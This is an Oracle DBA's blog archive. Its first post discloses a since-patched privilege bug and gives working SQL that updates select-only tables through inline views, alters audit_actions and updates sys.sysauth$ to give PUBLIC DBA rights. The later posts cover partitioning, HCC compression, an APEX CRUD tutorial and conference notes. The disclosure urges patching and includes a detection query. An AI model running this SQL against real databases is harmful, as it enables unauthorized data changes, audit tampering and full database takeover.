Category: Oracle

June 18th, 2014 by mathias

A friend and, at the time, co-worker at Kentor AB found this bug. He had the tenacity to track it down and prove that it was a real bug and not just a flaw in the logging mechanism, where it first appeared to occur.

Today is the day when I can finally speak about a bug I asked for a peer review on over a year ago. I had to pull that blog post offline when it became clear that we had indeed found what I think is a monster bug. It was difficult to fix, so while it was quiet online about the bug, Oracle was hard at work fixing it. In fact it turned out to be two different bugs, each plugged separately.

Before we get to the meat of the issue, have you applied the January 2014 CPU? No? OK, we'll wait while you take care of that. Trust me, you want to have it installed. Back already? Good. Patching really doesn't take too long. :)

I've spent a number of years diligently applying the correct grants for different users to make sure every user had just what they needed. It turns out it was wasted effort. Had the users known about this bug, they could have circumvented their lack of access. Truth be told, I really have no idea if someone did. In fact, the bug was such that it was abused by mistake in production at a large Oracle shop. This bug is present in all versions of the database (as far as we know) and it has been fixed with the latest CPU for 11g and 12c. If you run an older version, you should upgrade now! Running anything older than 11 at this point probably means you're not reading blogs about databases anyway.

So what exactly is the bug then? In short, you can update data in tables you only have select rights on. How can that be, you have tested that multiple times? True, the SQL has to be written in a pretty specific way to trigger the bug. In a database that is a base install, or at least predates the January 2014 CPU, the following test case should prove the issue. You can use most of it to verify the problem, though you will probably not want to test the privilege escalation in a production system.

Let us first create some users for our test.

drop user usra cascade;
create user usra identified by usra default tablespace users;
alter user usra quota unlimited on users;
grant connect to usra;
grant create table to usra;
--
drop user usrb cascade;
create user usrb identified by usrb;
grant connect to usrb;
grant create view to usrb;
--
drop user usrc cascade;
create user usrc identified by usrc;
grant connect to usrc;
grant select any dictionary to usrc;

We create a user usra that can create tables, usrb that can create views and usrc that can only select from the dictionary. These users will allow us to test the different versions of this bug in a controlled fashion.

Let's set up a test table in the usra account.
create table t1 (col_a varchar2(10) not null);
insert into t1 (col_a) values ('Original');
--
commit;
--
grant select on t1 to usrb;

We now have a table with a single row that usrb can only read from, or so we would think. Let us first create a very basic view and try to update it.
drop view view1;
create view view1 as select * from usra.t1;
update view1 set col_a = 'Whoops1';

So that didn't work. Or rather, the view was created but the update failed. That is how it should be; we have no update access on the table.

Let's now try to create a view on that view, which we then update, to see what happens if we add just a little bit of complexity to this.

drop view view2;
create view view2 as select * from view1 where col_a in (select max (col_a) from view1 group by col_a);
update view2 set col_a = 'Whoops2';

This update suddenly works (before the above mentioned CPU). So our meticulously granted privileges are overridden by a view with a sub-select on the same view. Not good.

Could the sub-select be simplified? Does it need to select from the same view and is an aggregation needed to make this bug expose itself?

drop view view3;
create view view3 as select * from view1 where 1 in (select 1 from dual);
update view3 set col_a = 'Whoops3';

Apparently it could not be simplified enough to just do a sub-select from dual. On to other possible simplifications.

What if we just read a hard-coded value from the first row in the table, would that work?
drop view view4;
create view view4 as select * from view1 where 1 in (select 1 from view1 where rownum = 1);
update view4 set col_a = 'Whoops4';

Yup, that is enough to break through the privileges.

How about just using a select without even having to have the right to create a view?
update
(with x as (select * from usra.t1) select * from x) t1
set col_a = 'Whoops5';

Ouch. That too was possible. So all it takes is select access on a table and we can update it. How do we stop someone from abusing this when a pure select, with no right to create objects, is enough? You see why we pulled the original blog post? For a time this was something that would be very hard to defend your database against.

How about using it to update things in the data dictionary? Yes, that too is possible. Some things are available to any user, such as audit_actions.

update
(with x as (select * from audit_actions) select * from x) t1
set name = 'Mathias was here';

This update also works. So auditing can be changed, probably not a good thing if you trust your audit_actions table.

How about escalating the privileges we have (or rather that anyone has)? Yes, that is also possible with a bit of knowledge.

select * from sys.sysauth$
where grantee# = (select user_id from all_users where username = 'HR')
and rownum = 1;

Here we steal a privilege held by the HR user, probably a privilege that will not be missed for a long time in most databases. With this we will turn PUBLIC into a proper DBA, meaning that any account can do almost anything in the database.

update
(with x as (select * from sys.sysauth$ where grantee# = 103 and privilege# = -264 and sequence# = 1551)
select * from x) t1
set grantee# = 1
,privilege# = 4;

Just like that we have given ourselves and everyone else DBA access. Now we can do whatever we want including covering our tracks in most databases.
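If you want to check whether something like this has already been abused in one of your databases, a query along these lines is a reasonable starting point. It is just a sketch and assumes the escalation was done by granting the DBA role to PUBLIC as in the example above; a real review should of course look much wider than this.

select grantee
      ,granted_role
      ,admin_option
  from dba_role_privs
 where grantee = 'PUBLIC'
   and granted_role = 'DBA';

Any row returned here should make you very suspicious.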

So I ask again, are you *really* sure that your database is secure?

This is scary stuff and this only goes to show that even a mature product needs to be kept up with current patches. If you are not on a CPU from this year, PLEASE give it a high priority to make it happen today.

And PLEASE do not test this in production. If you do and your DBA catches you, he will lecture you forever, if not report you up the chain of command. But please do spread the word that this issue exists and needs to be plugged ASAP.

Posted in Bug, DBA, Oracle, Security

June 12th, 2013 by mathias

Wrap-up

This is the last post in this series and I'll not introduce anything new here, but rather just summarise the changes explained and talk a bit about the value the solution delivers to the organisation.

Let’s first review the situation we faced before implementing the changes.

The cost of writing the log records to the database was such that all the parallel writing from many different sources introduced severe bottlenecks, to the point that the logging feature had to be turned off for days at a time. This was not acceptable, but rather than shutting down the whole system, which would put lives in immediate danger, it was the only option available. Even if the writing had been fast enough, the moving of data was taking over twice the time available, and it was fast approaching the point where data written in 24 hours would take more than 24 hours to move to the historical store for log data. That would of course have resulted in an ever growing backlog even if the data move ran 24×7. On top of that the data took up 1.5 TB of disk space, costing a lot of money and raising concerns about our ability to move it to EXADATA.

To resolve the contention that crippled the overall system during business hours, we changed the table setup to have no primary keys, no foreign keys and no indexes. We also made the tables partitioned such that we get one partition per day.
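To make that concrete, here is a minimal sketch of the kind of table definition this boils down to. The table and column names are made up for the illustration and the real tables of course had more columns; interval partitioning is one way to get the one-partition-per-day layout without having to pre-create partitions.

create table log_operational
( log_time   timestamp      not null
, log_source varchar2(100)
, log_text   varchar2(4000)
)
partition by range (log_time)
interval (numtodsinterval(1, 'DAY'))
( partition p_first values less than (timestamp '2013-01-01 00:00:00')
);
-- Deliberately no primary key, no foreign keys and no indexes,
-- so the many concurrent writers never contend on index blocks.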

To make the move from operational tables to historical tables faster, we opted to have both in the same instance on EXADATA. This allowed us to use partition exchange to swap the partition out of the operational table and into the historical table. This took just a second, as all we did was update some metadata about which table the partition belongs to. Note that this ultra fast operation replaced a process that used to take around 16 hours, for which we had a 6.5 hour window, and the time it took kept growing as the business grew.
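A minimal sketch of what such a swap can look like is shown below. The names are made up, and the intermediate heap table log_stage must have exactly the same column layout as the partitioned tables; exchanging a partition between two partitioned tables is done in two steps via such a plain table.

-- Step 1: swap the finished day out of the operational table into a plain staging table.
alter table log_operational
  exchange partition p_20130611 with table log_stage;

-- Step 2: swap the staging table into the matching (empty) partition of the history table.
alter table log_history
  exchange partition p_20130611 with table log_stage;

Both statements are metadata-only operations, which is why the whole move completes in about a second regardless of how much data the partition holds.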

Finally, to reduce the space consumed on disk we used HCC – Hybrid Columnar Compression. This is an EXADATA-only feature for compressing data such that columns with repeating values get a very good compression ratio. We went from 1.5 TB to just over 100 GB. This means that even with no purging of data it would take us over five years to get back to the amount of storage this used to require.

So in summary:

  • During business hours we use 20% of the computing power and even less of the wall clock time it used to take.
  • The time to move data to the historical store was reduced from around 16 hours to less than one second.
  • Disk space requirements were reduced from 1.5 TB to just over 100 GB.

And all of this was done without changing one line of code. In fact there was no rebuild, no configuration change or anything else needed to make this drastic improvement work with all the different systems that were writing to these log tables.

One more thing to point out here is that all these changes were made without using traditional SQL. The fact that it is an RDBMS does not mean that we have to use SQL to resolve every problem. In fact, SQL is often not the best tool for the job. It is also worth noting that these kinds of optimisations cannot be done by an ORM; it is not what they do. This is what your performance or database architect needs to do for you.

For easy lookup, here are links to the posts in this series.

  1. Introduction
  2. Writing log records
  3. Moving to history tables
  4. Reducing storage requirements
  5. Wrap-up (this post)

Posted in DBA, EXA, Oracle, Partitioning, Performance

June 5th, 2013 by mathias

Reducing storage requirements

In the last post in this series I talked about how we sped up the move of data from operational to historical tables from around 16 hours down to just seconds. You find that post here.

The last area of concern was the amount of storage this took and would take in the future. As it was currently taking 1.5 TB it would be a fairly large chunk of the available storage and that raised concerns for capacity planning and for availability of space on the EXADATA for other systems we had plans to move there.

We set out to see what we could do both to estimate the maximum disk utilisation this data would reach and to minimize the needed disk space. There were two considerations: minimize disk utilisation while at the same time not making query time any worse. Both of these were of course to be achieved without adding a large load to the system, especially not during business hours.

The first attempt was to just compress one of the tables with traditional table compression. After running the test across the set of tables we worked with, we saw a compression ratio of 57%. Not bad, not bad at all. However, this was now going to run on EXADATA. One of the technologies that is EXADATA only (to be more technically correct, only available with Oracle branded storage) is HCC. HCC stands for Hybrid Columnar Compression. I will not explain how it differs from normal compression in this post, but as the name indicates the compression is organised around columns rather than rows as in traditional compression. This can achieve even better results, at least that is the theory, and the marketing for EXADATA says that this is part of its magic sauce. Time to take it out for a spin.

After having set it up for our tables, with the exact same content as we had with normal compression, we had a compression rate of 90%. That is, 90% of the needed storage was saved by using HCC. I tested the different options available for the compression (query high and low as well as archive high and low), and ended up choosing query high. My reasoning was that the improvement of query high over query low was well worth the extra processing power. I got identical results with query high and archive low: they took the same time, resulted in the same size dataset and querying took the same time. I could not tell them apart in any way. Archive high however is a different beast. It took about four times the processing power to compress, and querying took longer and used more resources too. As this is a dataset I expect the users to want to run more and more queries against once they see that it can be done in a matter of seconds, my choice was easy: query high was clearly the best for us.
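If you want to run a similar comparison on your own data, a simple way is to create one copy of a representative table per compression setting and compare the segment sizes. This is just a sketch with made-up names; a CTAS is a direct path operation, so HCC kicks in right away.

create table log_qlow  compress for query low    as select * from log_history;
create table log_qhigh compress for query high   as select * from log_history;
create table log_ahigh compress for archive high as select * from log_history;

select segment_name
      ,round(bytes / 1024 / 1024) as mb
  from user_segments
 where segment_name in ('LOG_QLOW', 'LOG_QHIGH', 'LOG_AHIGH');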

How do we implement it then? Setting a table to compress for query high and then running normal inserts against it does not achieve a lot. There are some savings, but they are marginal compared to what can be achieved. For HCC to kick in, we need direct path writes to occur. As this data is written once and never updated, we can compress everything once the processing day is over. Thus, we set up a job to run thirty minutes past midnight which compresses the previous day's partition. This is just one line in the job that does the move of the partitions described in the previous post in this series.
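A sketch of what that nightly step can look like is below. The table name is made up, and I have assumed the partitions are named after the day they hold; with interval partitioning you would instead look up the system-generated partition name in user_tab_partitions. The real job also did the partition exchange described in the previous post.

begin
  dbms_scheduler.create_job(
    job_name        => 'compress_yesterdays_partition',
    job_type        => 'PLSQL_BLOCK',
    job_action      => q'[begin
                            execute immediate
                              'alter table log_history move partition p_'
                              || to_char(sysdate - 1, 'YYYYMMDD')
                              || ' compress for query high';
                          end;]',
    start_date      => trunc(sysdate) + 1 + 30 / 1440,   -- 00:30 tonight
    repeat_interval => 'FREQ=DAILY; BYHOUR=0; BYMINUTE=30',
    enabled         => true);
end;
/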

The compression of one very active day takes less than two minutes. In fact, the whole job to move and compress has run in less than 15 seconds for each day's data since we took this solution live a while back. That is time well worth the 90% saving in disk consumption we achieve.

It is worth noting that while HCC is an EXADATA feature not available in most Oracle databases, traditional compression is available. Some forms of it require licensing, but it is there, so while you may not get the same ratio as described in this post you can get a big reduction in disk space consumption using the compression method available to you.

With this, the last piece of the puzzle fell into place and there were no concerns left with the plan for fixing the issues the organisation had with managing this log data. The next post in this series will summarise and wrap up what was achieved with the changes described in the series.

Posted in DBA, Oracle, Partitioning, Performance

March 15th, 2013 by mathias

In this post I'll finish up the CRUD implementation using records, procedures and views. This series of blog posts started with this post, which was followed by this one.

At this point we have a working report that links to a form. The report is based on a view and the form is based on a procedure. So far the form only loads the record using a procedure that takes a record in its signature. In this post we'll complete the functionality by using the same form for insert, update, and delete.

Let’s start with adding a mode page item to the form. We will use this to know if the form is invoked in insert or in update/delete mode.

  • Right-click on “Form on Stored Procedure” on the page where your form is (page 4 in my example)
  • Select “Create Page Item”
  • Select Hidden
  • Give the page item a name, like P4_MODE.
  • Click “Next”
  • Click “Next” (again)
  • Select “Create Item”

You now have a new page item which is not displayed, but whose value you can reference on this page.

To make this example easy, we'll start by implementing just the update functionality. But first we'll go to the report and change the link column to pass in a "U" for the mode page item when it is clicked.

In the page with the report, perform the following steps.

  • Right-click “List of Employees”
  • Click “Edit Report Attributes”
  • Scroll down to “Link Column”
  • For Item 2, enter the name and value we want the newly created page item to be set to. P4_MODE and U in my case.
  • Apply Changes

Now with that done, let’s head back to the page with the form. But before we make any changes there, we need to change the package to add a procedure for updating a row in the emp table.

Here is the code for the procedure we’ll use.

create or replace package tb_access as
  type t_emp_rec is record (empno emp.empno%TYPE
                           ,ename emp.ename%TYPE);

  procedure read_emp(p_in_empno     in emp.empno%type
                    ,p_out_emp_rec out t_emp_rec);

  procedure write_emp(p_in_empno    in emp.empno%type
                     ,p_in_emp_rec  in t_emp_rec);
end tb_access;
/
create or replace package body tb_access as
  procedure read_emp(p_in_empno in emp.empno%type
                    ,p_out_emp_rec out t_emp_rec) is
    begin
      select empno
            ,ename
        into p_out_emp_rec.empno
            ,p_out_emp_rec.ename
        from emp
       where empno = p_in_empno;
  end read_emp;
----------------------------------------------------
  procedure write_emp(p_in_empno   in emp.empno%type
                     ,p_in_emp_rec in t_emp_rec) is
    begin
      update emp
         set ename = p_in_emp_rec.ename
       where empno = p_in_empno;
  end write_emp;
end tb_access;
/

This code adds the procedure write_emp, which also takes empno and the record used for read_emp, only this time they are both in parameters, as we'll not return any data from the procedure that writes to the table. The actual code in the procedure is a very simple update that sets ename to the name in the record for the row that has the empno passed in.

With this in place we're ready to change the form to call this procedure upon submit. We do this by taking the code used for reading in the record (the process in page rendering) and putting it into the "Run Stored Procedure" process we commented out in page processing.

The code we copy looks like this:

declare
  in_emp_rec tb_access.t_emp_rec;

begin
  tb_access.read_emp(p_in_empno    => :p4_empno
                    ,p_out_emp_rec => in_emp_rec);

  :p4_ename := in_emp_rec.ename;
end;

Replace the code in “Run Stored Procedure” with the above and change it to look like this:

declare
  in_emp_rec tb_access.t_emp_rec;

begin
  in_emp_rec.ename := :p4_ename;

  tb_access.write_emp(p_in_empno    => :p4_empno
                     ,p_in_emp_rec  => in_emp_rec);
end;

In the "Run Stored Procedure" process you could change the condition to "- Select condition type -" so it runs regardless of how the page is submitted. It is currently conditioned to run only when the Save button is clicked; leave that condition in place for now.

With that in place, it is time to test the form's new functionality. Run the report, click on the link and update the name of an employee. Assuming you followed the above and made the changes in the right places, the form will now update the name of the employee.

The next step in this will be to add insert functionality to the form. First off is to set up the package to support inserting an employee. As we’re now going to have both insert and update through the same procedure, we need to include the mode in the signature of the procedure.

Let’s first update the package specification so the write_emp looks like this:

  procedure write_emp(p_in_empno    in emp.empno%type
                     ,p_in_mode     in varchar2
                     ,p_in_emp_rec  in t_emp_rec);

The procedure in the package needs to be updated to look like this:

  procedure write_emp(p_in_empno   in emp.empno%type
                     ,p_in_mode    in varchar2
                     ,p_in_emp_rec in t_emp_rec) is
    begin
      case p_in_mode
        when 'U' then
          update emp
             set ename = p_in_emp_rec.ename
           where empno = p_in_empno;
        when 'I' then
          insert into emp
             (empno
             ,ename)
           values((select max(empno) + 1 from emp) 
                 ,p_in_emp_rec.ename);
      end case;
  end write_emp;

Before the form is functional again, we need to change the call in “Run Stored Procedure” to match the new signature of write_emp.

declare
  in_emp_rec tb_access.t_emp_rec;

begin
  in_emp_rec.ename := :p4_ename;

  tb_access.write_emp(p_in_empno    => :p4_empno
                     ,p_in_mode     => :p4_mode
                     ,p_in_emp_rec  => in_emp_rec);
end;

With that change in place the form now works and the mode we set on the link column is now passed to the procedure to make sure an update is performed and not an insert.

To introduce insert functionality, we want to add a new button on the page with the report that invokes the form in insert mode. To add the button follow these steps on the page with the report.

  • Right-click on “List of Employees”
  • Select “Create Region Button”
  • Set name and label to “Add”
  • Click Next
  • Set position to “Right of Interactive Report Search Bar”
  • Set Alignment to “Left”
  • Click Next.
  • Select action “Redirect to Page in this Application”
  • Set the page to your form-page (4 in my example)
  • Set Request to INSERT
  • Set “Clear Cache” to 4
  • Set “Set these items” to P4_MODE
  • Set “With these values” to I.
  • Click Next.
  • Click “Create Button”

If you test the page, you'll see that it ends up immediately to the right of the search bar. Do not click on the button just yet.

Now go to the page with the form and open the process in rendering (Read Emp).

  • Set “Condition Type” to “Value of item / column in expression 1 = expression 2”.
  • Set Expression 1 to P4_MODE.
  • Set Expression 2 to U
  • Apply Changes

This ensures that we’re only reading a row from emp when updating data. When inserting, there is no data to be read and displayed.

You may also want to set the same condition on the page item for empno to hide it when inserting as there is no empno to display then.

Test the function now by running the report page and clicking the "Add" button. It adds a row with the name you enter on the form. The rest of the columns will have null as their value. Adding more columns to the procedures and the form is an exercise left to the reader.

With the function now supporting insert and update, it is time to add the delete function so we can get rid of some of the test employees we’ve created. This function will be implemented only on the form and by adding supporting code in the package. Thus, the delete will be performed by clicking on the link and then clicking on a delete button on the form.

To implement this we’ll update the implementation of the write_emp procedure once more.

  procedure write_emp(p_in_empno   in emp.empno%type
                     ,p_in_mode    in varchar2
                     ,p_in_emp_rec in t_emp_rec) is
    begin
      case p_in_mode
        when 'I' then
          insert into emp
             (empno
             ,ename)
           values((select max(empno) + 1 from emp) 
                 ,p_in_emp_rec.ename);
        when 'U' then
          update emp
             set ename = p_in_emp_rec.ename
           where empno = p_in_empno;
        when 'D' then
          delete from emp
           where empno = p_in_empno;
      end case;
  end write_emp;

With the package updated, our next step is to change the code in the “Run Stored Procedure” process on the form page.

declare
  in_emp_rec tb_access.t_emp_rec;
  v_mode     varchar2(1);
begin
  in_emp_rec.ename := :p4_ename;
  v_mode           := :p4_mode;

  if :REQUEST = 'DELETE' then
    v_mode := 'D';
  end if;

  tb_access.write_emp(p_in_empno    => :p4_empno
                     ,p_in_mode     => v_mode
                     ,p_in_emp_rec  => in_emp_rec);
end;

The code is now changed such that a click on the delete button (not implemented yet) will set the mode to D. This is done by checking the REQUEST which we will set to DELETE for the button we’ll create now. REQUEST is a standard attribute available on buttons and branches in APEX. By setting it to a unique value, we can check for different invocation methods in code. This allows us to deal with different scenarios with just one block of code.

To add the button, follow these steps.

  • On the form-page, right-click on “Form on Stored Procedure”.
  • Select “Create Region Button”
  • Set “Button Name” and “Label” to “Delete”.
  • Click Next
  • Set “Position” to “Top of Region”
  • Set Alignment to “Left”
  • Click Next
  • Click Next (again)
  • Click Create Button

The value of “Button Name” is used to set REQUEST when the page is submitted. With this in place our form should now support deleting rows also. Update the branch on the page to not have a condition on the button pressed. Take it out for a spin.

There is one thing left to do, hide the delete button when the form is invoked to add a row.

  • Right-click the delete-button under rendering.
  • Select “Edit”.
  • Scroll down to conditions.
  • Set “Condition Type” to “Value of item / column in expression 1 = expression 2”.
  • Set Expression 1 to P4_MODE.
  • Set Expression 2 to U
  • Apply Changes

Now you've got a CRUD solution based on an interactive report with a form that supports insert, update, and delete. The total amount of code required is very small, and you have still isolated the APEX application from changes to the table structure by using a view; even the record can have fields added to it without impacting the functionality of your application. Developing with the methods demonstrated here allows you to create these applications almost as fast as making them table based, but you have much more control and can make a lot of changes without touching the application.

Posted in APEX, Oracle, PL/SQL, SQL

April 13th, 2011 by mathias

Quite a while ago I wrote about how to set up the alert log as an external table. Since then 11g has been introduced and is now widely used. It of course changes the location and makes the alert log an XML file.

While it is possible to select from it using xml functions like Laurent Schneider does here, it is still a bit cumbersome.

Tanel Poder (@TanelPoder) found a nicer way by using X$DBGALERTEXT which does a really nice job of parsing the xml-file into a lot of different columns. A friend at work, Daniel Ekberg, let me know about it a while back. I just never got around to looking into it until today.

It is very nice but there is one slight issue with it. It is X$ and thereby only available to SYSDBA. That can of course be solved with a view and proper grants and synonyms. However, views on X$ can cause some issues during upgrades so such views should probably be dropped before upgrading.
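With that caveat in mind, a minimal sketch of such a setup could look like the following. It has to be created as SYS, since the X$ fixed tables are only visible there, the grantee is a placeholder, and I have only picked two of the many columns X$DBGALERTEXT exposes.

create or replace view alert_log_v as
  select originating_timestamp
        ,message_text
    from x$dbgalertext;

grant select on alert_log_v to monitoring_user;
create or replace public synonym alert_log_v for sys.alert_log_v;

-- Remember to drop the view again before upgrading the database.

A monitoring account can then do things like:

select originating_timestamp, message_text
  from alert_log_v
 where message_text like '%ORA-%'
   and originating_timestamp > sysdate - 1;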

While not documented, this is a neat way to gain access to a lot of information from the log.xml (alert log).

Posted in Alert Log, DBA, Oracle, SQL, XML

October 3rd, 2010 by mathias

Yes, this post is a little out of order as it clearly didn't take place after the Thursday afternoon sessions. I missed it during the conference so I had to catch up on it later on the on demand site. I thought it was interesting enough to write up a few notes.

It was held by Tom Kyte and the subject was "What's new in database development". It'd be more correct to say Oracle development than database development as he covered just about any area that Oracle focuses on.

He started with APEX and spent a lot of time on it. The coverage APEX gets in general sessions and the number of really good APEX sessions speaks volumes about how strong APEX is becoming within the Oracle development technologies.

Tom shared a little background on how APEX was created by Mike Hichwa when Mike sat next to Tom and wrote the initial code for APEX. Anyone who has been impressed with the way bind variables are handled in APEX got their explanation for why. Tom has relentlessly been preaching about how to do it and the issues caused when it is not done well. So it all makes sense when you hear that it was Tom who wrote the initial code for bind variable handling in APEX.

Tom went on to say that they are seeing a lot of momentum behind APEX right now. The catch phrase he used to explain why it grows fast in popularity was "Easy architecture, easy to deploy, and easy to run".

Tom then spent some time talking about the performance of APEX, as a lot of people still think it is not able to handle enterprise-level system demands.

The site apex.oracle.com that runs all the applications people create on Oracle's hosted APEX "test and demo" site is a surprisingly small computer. The specifications for it are:

  • PowerEdge 1950
  • 2 dual-core Xeon 2.33 GHz
  • 32 GB RAM
  • Cost: $4,300 (in 2007)
  • Runs an 11g database

Not a very big computer to serve a site that provides support to anyone who wants to try APEX.

Tom shared some of the numbers for what apex.oracle.com is used for.

  • They had 3.5 million views (pages loaded and processed) last week.
  • Distinct users accessing during the week: 3,028
  • Total workspaces: 9,062
  • Applications: 32,776

I'd think most "enterprise" systems would have less demand than that.

Some of the biggest things on apex.oracle.com are:

  • SQL Developer updates 800K hits /week
  • Pro MED (Production system) 770K hits / week
  • Asktom 250K-1000K hits / week
  • APEX Appbuilder 238K hits / week
  • JDeveloper updates 175K hits / week

Impressive to serve all of that from a small(ish) computer.

Tom then shared some key features from the 4.0 release.

Websheets

Designed for the end user and for web-based content sharing. A solution that allows end users to stop mailing Excel documents around would be a good thing…

Dynamic Actions

Declarative client-side behavior. It is integrated in the framework. Uses jQuery.

This allows using common JavaScript functions for handling advanced user interface improvements, from validations to drag and drop and more.

Team Development

Allows you to manage the application development process within APEX. This makes APEX able to be used by large development projects. It has built in end-user feedback. When a user has a problem they can tell you directly in the application and it feeds into the team development features.

Oracle APEX Listener

Built in Java.

It is a good alternative to mod_plsql and it is certified against WLS and Glassfish.

After that long piece on APEX, Tom went through some improvements for other technologies.

SQL Developer

The data modeller is now free. It will now come with the product and will be supported with the database (just like SQL Developer itself).

It has real-time SQL monitoring. It will allow you to see what part of the execution plan Oracle is currently spending time in for a SQL. This exists in Enterprise Manager, but this gives the insight to many more as EM often is just used by the DBAs.

It can now find the SQL trace file and display the contents graphically in SQL Developer. This ought to make trace files much more accessible to developers.

It has support for AWR and ASH reports and has added developer-specific things that are not available in the other AWR/ASH-aware tools.

A hierarchical profiler is now also included to allow you to see which functions call which in a run of PL/SQL code.

SQL Developer now uses PL/SCOPE data to show information about where variables are defined and used. This is something that has been added to the database and can always be accessed with SQL, but it is more convenient to have it hooked into the development tool.

They have also added a DBA Navigator that allows DBAs to access most things they deal with in the database. Most objects (such as extents and tablespaces) can be seen and modified.

An interface for DBMS_SCHEDULER has been added. It is supposedly a much nicer way to configure jobs than doing it by hand, which can be both tedious and complicated.

Another neat feature is that auto tracing has been improved: not only can you trace one statement, you can now trace two statements and get a comparison report of the tracing so you can compare them. Since this usually has been done with Tom's "Runstats" package, I'd assume this feature has Tom's fingers all over it.

ODP.Net

It is free and provides native access to the database. It has statement caching (on the client side) and will support TimesTen in 11.2.0.2.

I'm not a .Net person at all, but it sounds as if this provides a lot of benefits both in use and in performance. If you work with .Net, then you will want to take a look at all the things Oracle provides in this area.

Java

There is a Universal Connection Pool for all technologies that use connection pools. This is supposed to reduce the overhead caused by having several connection pools.

For Secure Files there has apparently been a performance issue dealing with very large files; my understanding from Tom's presentation is that it resulted in double buffering. Now there is Zero Copy, which sounded as if it would remove all buffering and thereby improve the speed significantly.

Database Improvements

Tom focused on the optimizer and on developer related topics as this was a Develop keynote.

Tom showed how the optimizer could detect a three-way join that was not needed. It was a fairly complicated situation, but the optimizer can apparently completely skip accessing tables now if they are not needed for the end result.

PL/SQL

Edition-based redefinition is available in all editions of 11g. Tom thinks this is the killer feature of 11g, and says that it may be the first time the killer feature is available in all editions with no additional licensing requirements.

It allows live changing of code (PL/SQL and views). Live changing of data can already be done with online redefinition and online actions on indexes.

The process now is (a rough sketch of the commands involved follows the list):

  • Create new edition
  • Test new edition of the code while users still use the old.
  • Two options for rolling out
    • Let new sessions use the new one and allow old to keep using the old edition.
    • Switch everyone over to the new when the system is "idle". Takes just seconds.
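Roughly, the commands behind those steps look like this. The names are made up, and the application owner must have been editions-enabled first.

-- One-time preparation: allow the schema to have editioned objects.
alter user app_owner enable editions;

-- Create the new edition and let the application owner use it.
create edition release_2;
grant use on edition release_2 to app_owner;

-- Install and test the new code in the new edition while users keep running the old one.
alter session set edition = release_2;
create or replace procedure greet as
begin
  dbms_output.put_line('Hello from release_2');
end;
/

-- When ready, make the new edition the default for all new sessions.
alter database default edition = release_2;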

That was the end of Tom's presentation. He covered a lot of technologies, even some that are not mentioned above (like Ruby). What I think is interesting is what wasn't mentioned at all.

The first one that comes to mind is JDeveloper. It has not become very popular with Java purists and it was not mentioned at all. There are some rumors of it being de-emphasized by Oracle, as how you work with it seems to be very far from how most Java projects want to organize their builds and deployments.

The next interesting omission is the technology most closely integrated with JDeveloper. No mention at all at Oracle Develop of their key Java development framework. ADF did not get any love at all, and that is not true just for this presentation; there were very few mentions of it in any of the presentations I attended. True, I did not seek out ADF sessions, but virtually every single presentation on non-APEX technologies found a way to talk about APEX; the opposite was true for ADF. Even when you felt that someone was building up to a plug for ADF, they never went there.

The lack of love for ADF and JDeveloper may mean that they are not considered critical to Oracle's success anymore. I assume ADF was used to build the Fusion Applications, which would mean that the tool and product are probably not going away, but could it mean that they are primarily focused on large product development and not something that is good for custom development projects?

Personally it feels as if ADF is now essentially becoming a tool used when integrating with Oracle (fusion) Apps or Oracle SOA Suite. I'm not sure a custom development project would end up using ADF. Of course there will be exceptions to that, but they will probably be fewer and fewer.

It could also be that JDeveloper and ADF starts becoming less and less of something for the customers and more and more of an internal tool at Oracle. I'm sure they have very specialized versions and techniques used in development to help the development of the fusion applications.

On the other hand, it could just be that this wasn't the time for releasing improvements to JDeveloper or ADF. I have trouble convincing myself of that though. The reason is that Oracle now owns Java, and if there ever was a reason to show JDeveloper and ADF in their full glory, now would have been the time. By not releasing improvements to what are considered problems with JDeveloper and ADF, they have probably given more momentum to the competing tools. They of course have another tool in this space now; maybe NetBeans will be the future migration path for JDeveloper once ADF finds a new home.

Posted in APEX, DBA, OOW, Oracle, Performance, SQL

October 1st, 2010 by mathias

For the afternoon I had two sessions to attend. The first was "Quantifying Oracle Performance" and the second was "The X-files – Managing exadata and highly available databases". I anticipated both to be great and possibly among my favorites for the week.

Unfortunately neither met my expectations, so this is going to be a fairly short post.

The first one was "Quantifying Oracle Performance" with Craig Shallahamer. I have seen many presentations by Craig and he has always been good and his material very interesting. Even if you do not use queueing simulations at work, having seen his presentations on how queueing affects performance helps when trying to understand system performance. This presentation was intended to help you build a model where you could show where your solution is today on a response time curve, i.e. where in the famous elbow you are now and where different changes would put you.

Craig showed some parts of how to model your current performance and to use AWR to figure out some numbers to use. However, there was virtually no data on how to model a planned change. I guess you have to implement and test that change with production like load to get the same data and then be able to plot it on the same graph as you created for your current solution.

I think the idea of showing non technical users the impact and how close to instability you currently are in a graphical manner is very good, as is the idea of comparing possible alternative solutions with it. However, I think the participants get only this idea and they have to do a lot of work on their own to make this a model they can use to work with their clients.

So, (sorry Craig) this did not feel like a presentation that is complete at this point. I do believe it could be a great one if it reaches its goal but I don't think it is there yet.

The next one was "The X-files – Managing Exadata Database Machine and highly available databases" and this was not one that fell short of its goal, it did not even make an attempt at meeting it. Pure bait and switch.

To explain this better here is the abstract

The Oracle Exadata is a complete package of software, servers, storage, and networking designed for all data processing and data management challenges. In this session, experts will walk you through Oracle maximum availability architecture best practices for managing this critical piece of your operating infrastructure through Oracle Enterprise Manager. They will also provide additional guidance on troubleshooting the Oracle Exadata and Oracle high-availability database solutions.

I read that as a session that would talk about how I should set things up and how to achieve an HA solution that is stable and can be proactively managed. What I got was a long session about how I should fork over money to ACS (Advanced Customer Support). Yes, ACS is probably great, and big and important installations should probably have them as their dedicated Oracle support. However, knowing how to take care of your own solution is what I expected from the abstract and there was none of it. This was instead a one hour long plug for ACS.

I took away two things. The first is that a lot of work has been done to make EM monitor all aspects of an exadata box. It looks like they have a lot of interesting information. Unfortunately access to a lot of it seems to require using ACS and the appliance they put in place to aggregate information. The other thing is that setting up dataguard via EM now looks really easy. Maybe it is time to start using EM for setting up DG.

There was a brief mention of a tool that can estimate the benefit of using exadata based on a SQL tuning set. It was called something like "SPA exa database machine simulator".

Posted in OOW, Oracle, Performance

September 29th, 2010 by mathias

The day starts with a presentation by Tom Kyte about "What else can you do with system and session data".

Tom starts with reviewing the history of tuning an Oracle database.

The prehistoric era (v5) required writing debug code, as that was the only way to get any information about what the code did.

The dark ages followed (v6), when Oracle introduced:

  • Counters/ratios
  • bstat/estat
  • SQL Trace
  • The first few (7?) v$-views are introduced

The renaissance era (v7) introduced a few more things:

  • The wait event instrumentation was introduced
  • Move from counters to timers
  • Statspack

The modern era (v10) introduced the tools we prefer today:

  • DB-Time tuning
  • Multiple scoping levels (AWR)
  • Always on, non-intrusive
  • Built into the infrastructure – instrumentation, ASH, AWR, ADDM, EM

